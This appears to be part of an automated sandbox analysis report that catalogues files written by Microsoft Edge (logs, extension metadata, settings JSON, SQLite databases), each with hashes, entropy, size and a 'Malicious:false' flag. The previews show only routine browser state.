                                                                                                                                                                                                                                                                SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):324
                                                                                                                                                                                                                                                                Entropy (8bit):5.24347694310553
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7A143+q2PCHhJ23oH+Tcwt8NIFUt8OA1UsZmw+OA1UsVkwOCHhJ23oH+Tcwt8+ed:7Y43+vBYebpFUt8OYr/+OY7V56YebqJ
                                                                                                                                                                                                                                                                MD5:4120F6B1F938F6C92E790CE07F6BE2F5
                                                                                                                                                                                                                                                                SHA1:3AAFF30D37A3B2F1B409BFB55B6BDCBBB2CD4B3C
                                                                                                                                                                                                                                                                SHA-256:92675BDDC784BEF4D46A0338296F6895501C1E79FD98D72ADD693514D48D78C7
                                                                                                                                                                                                                                                                SHA-512:283D66C559A6B889DFA3E1DB2A82915F3B62E4626098C6090F6FE8F15BF4C018EFC2A9A59D52EBCAB11D0C5B54B64A982E166E7DEB52F7DCBDEDF781B4B218F3
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:10.358 144c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/16-07:47:10.359 144c Recovering log #3.2024/12/16-07:47:10.359 144c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):324
                                                                                                                                                                                                                                                                Entropy (8bit):5.24347694310553
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7A143+q2PCHhJ23oH+Tcwt8NIFUt8OA1UsZmw+OA1UsVkwOCHhJ23oH+Tcwt8+ed:7Y43+vBYebpFUt8OYr/+OY7V56YebqJ
                                                                                                                                                                                                                                                                MD5:4120F6B1F938F6C92E790CE07F6BE2F5
                                                                                                                                                                                                                                                                SHA1:3AAFF30D37A3B2F1B409BFB55B6BDCBBB2CD4B3C
                                                                                                                                                                                                                                                                SHA-256:92675BDDC784BEF4D46A0338296F6895501C1E79FD98D72ADD693514D48D78C7
                                                                                                                                                                                                                                                                SHA-512:283D66C559A6B889DFA3E1DB2A82915F3B62E4626098C6090F6FE8F15BF4C018EFC2A9A59D52EBCAB11D0C5B54B64A982E166E7DEB52F7DCBDEDF781B4B218F3
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:10.358 144c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/16-07:47:10.359 144c Recovering log #3.2024/12/16-07:47:10.359 144c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):429
                                                                                                                                                                                                                                                                Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):115717
                                                                                                                                                                                                                                                                Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):49152
                                                                                                                                                                                                                                                                Entropy (8bit):3.647817067438668
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:aj9P0ycAjlrP/KbtpQkQerE773pLIRKToaA9gam6Iqhf:adgKlrP/se2E7WRKcca9
                                                                                                                                                                                                                                                                MD5:DA969EAC251439FB894D2E594F461474
                                                                                                                                                                                                                                                                SHA1:10F100DB402C0D538055E53D0F5D9B7CD96B4987
                                                                                                                                                                                                                                                                SHA-256:2AE678AA375598BF146EF9F558A649B3DF47476AAC704D657C20E49063A16BC6
                                                                                                                                                                                                                                                                SHA-512:A993264D4F1F049ACCA55EFB89CBD0FBC94F6A8EBAA39B3430407127FEBD8FEEB108DDEE791F274F3BB8746CA05B3D016A4ADE8CBE9D6EB519628451AB5F3E64
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):408
                                                                                                                                                                                                                                                                Entropy (8bit):5.339393266633813
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:7UbNvBYeb8rcHEZrELFUt8OUP/+OUd56Yeb8rcHEZrEZSJ:7UbRBYeb8nZrExg8OUzUP6Yeb8nZrEZe
                                                                                                                                                                                                                                                                MD5:3BCAF37F474CA7D906601CBDC27781C9
                                                                                                                                                                                                                                                                SHA1:7BF55092AC521590FB745714310FB245E1F085FD
                                                                                                                                                                                                                                                                SHA-256:2F51840AF03B58DEF96FDE3E3062338E9DDAFA9A32EA82CED514E098357E12D3
                                                                                                                                                                                                                                                                SHA-512:A5A342E80671122B0025AE623F9305BED837863CC0CE0A82C8192859EF9CA2EE0F2B21CF4D663D6CE9C50205E9E31D58F9F683800C5D7BB56C8F6116348031E6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:13.464 1b48 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/16-07:47:13.465 1b48 Recovering log #3.2024/12/16-07:47:13.465 1b48 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):408
                                                                                                                                                                                                                                                                Entropy (8bit):5.339393266633813
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:7UbNvBYeb8rcHEZrELFUt8OUP/+OUd56Yeb8rcHEZrEZSJ:7UbRBYeb8nZrExg8OUzUP6Yeb8nZrEZe
                                                                                                                                                                                                                                                                MD5:3BCAF37F474CA7D906601CBDC27781C9
                                                                                                                                                                                                                                                                SHA1:7BF55092AC521590FB745714310FB245E1F085FD
                                                                                                                                                                                                                                                                SHA-256:2F51840AF03B58DEF96FDE3E3062338E9DDAFA9A32EA82CED514E098357E12D3
                                                                                                                                                                                                                                                                SHA-512:A5A342E80671122B0025AE623F9305BED837863CC0CE0A82C8192859EF9CA2EE0F2B21CF4D663D6CE9C50205E9E31D58F9F683800C5D7BB56C8F6116348031E6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:13.464 1b48 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/16-07:47:13.465 1b48 Recovering log #3.2024/12/16-07:47:13.465 1b48 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1153
                                                                                                                                                                                                                                                                Entropy (8bit):5.599430551723923
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:9ZWTmEUlHhe2lw0g5bhg2seiXZiHW33yV03y1x4/inMyG:9ZxEcecw1/bsbXZi2HyV03Sx4/iMyG
                                                                                                                                                                                                                                                                MD5:37AF3C5CEEC2FB69C012725119917337
                                                                                                                                                                                                                                                                SHA1:AE1E15A4B6759E2426719F1E4B78D940E688D472
                                                                                                                                                                                                                                                                SHA-256:63C65F179B0899DBD392F9A42D76B3F8FD8779A5F08190129CDC7E249AF280DA
                                                                                                                                                                                                                                                                SHA-512:CA7E3582F966274BC11B0F1E8697BAAF87A4D610F607AE6947DBBFE54B571D5AF3A5DD9813AF056042DCC5294B1BD3F379C2CD199EAEEA209EDBD1DCBA4CF621
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:...Nz................VERSION.1..META:https://ntp.msn.com.............._https://ntp.msn.com..FallbackNavigationResult?.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":782}.!_https://ntp.msn.com..LastKnownPV..1734353246536.-_https://ntp.msn.com..LastVisuallyReadyMarker..1734353247664.._https://ntp.msn.com..MUID!.162DEC371C56639E2ED8F9601DDC6260.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1734353246623,"schedule":[-1,-1,37,4,-1,-1,16],"scheduleFixed":[-1,-1,37,4,-1,-1,16],"simpleSchedule":[18,17,48,40,11,50,44]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1734353246497.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241213.442"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_https

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):333
                                                                                                                                                                                                                                                                Entropy (8bit):5.196323856049425
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7AFyq2PCHhJ23oH+Tcwt8a2jMGIFUt8OAUvk11Zmw+OAUVc9RkwOCHhJ23oH+TcL:7syvBYeb8EFUt8OXkX/+O6R56Yeb8bJ
                                                                                                                                                                                                                                                                MD5:93C9EA3EA9367C66CBC06621E4170616
                                                                                                                                                                                                                                                                SHA1:2869C37317D93DC99084AEE8AC830704E8244134
                                                                                                                                                                                                                                                                SHA-256:DAA7D089F88481757C7F28BBB463D393FBD94E51C5B6AF669873D2A40CA9FAFC
                                                                                                                                                                                                                                                                SHA-512:4170E5D6B3215F8D93F91CDBD056099FDAF7A618386549211C802A46D9D58BEC7E2E2B29A566845FF76EC1927A48BCC217AE85C90CDA1BA153F1969B71859CBD
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:09.879 fe0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/16-07:47:09.880 fe0 Recovering log #3.2024/12/16-07:47:09.882 fe0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):333
                                                                                                                                                                                                                                                                Entropy (8bit):5.196323856049425
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7AFyq2PCHhJ23oH+Tcwt8a2jMGIFUt8OAUvk11Zmw+OAUVc9RkwOCHhJ23oH+TcL:7syvBYeb8EFUt8OXkX/+O6R56Yeb8bJ
                                                                                                                                                                                                                                                                MD5:93C9EA3EA9367C66CBC06621E4170616
                                                                                                                                                                                                                                                                SHA1:2869C37317D93DC99084AEE8AC830704E8244134
                                                                                                                                                                                                                                                                SHA-256:DAA7D089F88481757C7F28BBB463D393FBD94E51C5B6AF669873D2A40CA9FAFC
                                                                                                                                                                                                                                                                SHA-512:4170E5D6B3215F8D93F91CDBD056099FDAF7A618386549211C802A46D9D58BEC7E2E2B29A566845FF76EC1927A48BCC217AE85C90CDA1BA153F1969B71859CBD
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:09.879 fe0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/16-07:47:09.880 fe0 Recovering log #3.2024/12/16-07:47:09.882 fe0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\50660b4a-c309-4904-bed6-22406411e5dc.tmp

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\6d99b793-4d41-4271-b63b-a592a84cbf4b.tmp

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\88bb3bff-7dc9-40f9-a38f-c8256702b195.tmp

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\8b8128ed-63a2-48df-ade2-9ae723a2be17.tmp

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1452
                                                                                                                                                                                                                                                                Entropy (8bit):5.293818359480967
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:YcCp/WRdsZZVMdmwC5mWRdsHPyZFRudFGRRds9JZFGJ/I3w6C1E6maPsQYhbS7n7:YcCpWsPuCvs+fcKsFgCgakhYhbc
                                                                                                                                                                                                                                                                MD5:B0733CD56C6DAEC03253582405A3C607
                                                                                                                                                                                                                                                                SHA1:EBFFEB5D568DFC774355F3329BB1DD69A06D9D17
                                                                                                                                                                                                                                                                SHA-256:BB4556F6A892CD298278B5D16EB81F2B815018687B11F789213CE95806E5A11C
                                                                                                                                                                                                                                                                SHA-512:F6F90123E0314680B23966126634511E879E761A8094AB17BD3B0F3D58F09DEB8780519C56F319B4C3FB723FE3148453E6B4A14338D052F3518D809761FD2344
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343559442531603","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343559443198826","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343559451800699","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                Entropy (8bit):2.7765670339334374
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:tT5yl1bIIemkqBNFixnTFXc3T6Xcf0L/ZJVb:V5q1cIrkqBLitTSj6XI0LhJVb
                                                                                                                                                                                                                                                                MD5:279638263B6F948B5BA870D223F09E62
                                                                                                                                                                                                                                                                SHA1:87B380D27ADCEF23A271E291616F53EC907251A0
                                                                                                                                                                                                                                                                SHA-256:7A01E06FAE04F3AECEC0AB7232FBD96EEE001CBB0C1010A083041DE845DB645B
                                                                                                                                                                                                                                                                SHA-512:23B5C2DF1FD1FDB791C43BCA621DAC94042BF4CF60F29DC71E36A6C3F5D0B5CC62853E2D6C87A35FD2EA5AEE942FC9C5232818851587F0C8619FA4FC08886A2E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1452
                                                                                                                                                                                                                                                                Entropy (8bit):5.293818359480967
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:YcCp/WRdsZZVMdmwC5mWRdsHPyZFRudFGRRds9JZFGJ/I3w6C1E6maPsQYhbS7n7:YcCpWsPuCvs+fcKsFgCgakhYhbc
                                                                                                                                                                                                                                                                MD5:B0733CD56C6DAEC03253582405A3C607
                                                                                                                                                                                                                                                                SHA1:EBFFEB5D568DFC774355F3329BB1DD69A06D9D17
                                                                                                                                                                                                                                                                SHA-256:BB4556F6A892CD298278B5D16EB81F2B815018687B11F789213CE95806E5A11C
                                                                                                                                                                                                                                                                SHA-512:F6F90123E0314680B23966126634511E879E761A8094AB17BD3B0F3D58F09DEB8780519C56F319B4C3FB723FE3148453E6B4A14338D052F3518D809761FD2344
                                                                                                                                                                                                                                                                Malicious:false
